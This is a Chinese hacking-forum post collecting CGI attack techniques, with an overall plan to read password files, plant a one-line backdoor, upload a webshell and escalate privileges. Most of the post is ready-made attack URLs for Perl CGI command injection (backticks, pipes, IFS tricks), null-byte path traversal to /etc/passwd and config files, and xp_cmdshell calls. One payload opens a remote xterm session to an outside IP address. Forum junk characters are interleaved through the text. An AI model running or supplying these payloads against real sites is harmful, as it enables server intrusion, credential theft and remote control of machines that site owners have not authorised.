找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3008|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  
0 e! R& j! g& Ncookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  
- |7 n, M8 c4 K" b9 d' Y感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  
# s! i* b- K/ b8 }# @注“  . D! w9 z) I( D' l, ]* O! n
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
. L: t! p% |) F6 N9 t7 {4 F以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  
6 b( O/ V$ H7 N+ F: e9 ]9 Q5 @6 {. T$ y5 V  z# j
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  
) o0 l. a: i! _/ i2 Z) K5 uhttp://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  / ]* e0 Y/ u3 x; A$ O
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  
7 `" m6 e3 S. X& N4 W7 X; g  Qhttp://target.com/cgi-bin/home/news/sub.pl?`id`  5 T" q9 |% P9 q1 f7 E
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  * }* F# m' D2 {
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  
+ r5 k; i; U. F+ _" k8 X7 l3 T5 _" B; ?8 K# J8 r) n
http://target.com/test.pl;ls|  
+ i4 u8 V! A, l8 ?- ]http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  % K" e% S# z( m( D7 ~1 i
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  
8 A) m/ G/ `/ B* `/ ihttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  
; g6 D* v, _/ L; R" c) W8 u' F' g比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  
$ }& L2 n7 n. u/ \" T1 m: `3 Lhttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  
8 B; C3 }, N4 x& |6 J/ i
% x6 [" L$ J* Zhttp://target.com/test.pl?&........ /../../etc/passwd  ( L9 n$ H* @* \$ q3 e+ ?& V/ x
2 J1 l% P2 e: E* M7 A- d" ~% ]( T
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  ! R8 v  F3 g( c% A4 f' R
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  
3 B  F7 X9 Z; q1 E) _http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  
$ [( F1 }  n! j) A- ?0 R# i% X$ S: V# E. K0 W. s/ ]# i
http://www.target.org/show.php?f ... /include/config.php 查看php代码  ' q5 \7 Z, F! x4 g' ^: S, \( @# H( T3 a
http://www.target.org/show.php?f ... ng/admin/global.php  
( ?0 }( q) z4 A
6 X" \: T4 x5 a4 M' p+ Remm和ps的一句话
! P' w  o* k" \2 t5 t& D1 A6 k& n
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  * i' L, o% `7 B/ Q. y- u' f

- m( q" |) p8 h) G8 \>bbb%20|  
) X# Q- I9 {/ c' Y3 _0 u
7 N; i/ }2 K6 Z. R3 @+ `5 h1 uhttp://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  # b% `8 E& v% G

; T9 g+ Y1 _) I* @8 b; }0 ]http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  ) ?; x. k0 |4 G
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  
! z) h4 \8 e5 Q
- d/ e2 I3 y' ~; {& `0 C, p1 `相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  8 [7 k# d$ o+ j9 W/ i
http://target.com/index.html#cmd.exe  
) u1 m7 L3 U6 W3 bhttp://target.com/index.html?dummyparam=xp_cmdshell  . J( A0 O4 H/ P: K6 E
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  
( H" {" [$ i' f/ H5 [- ]; n5 D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表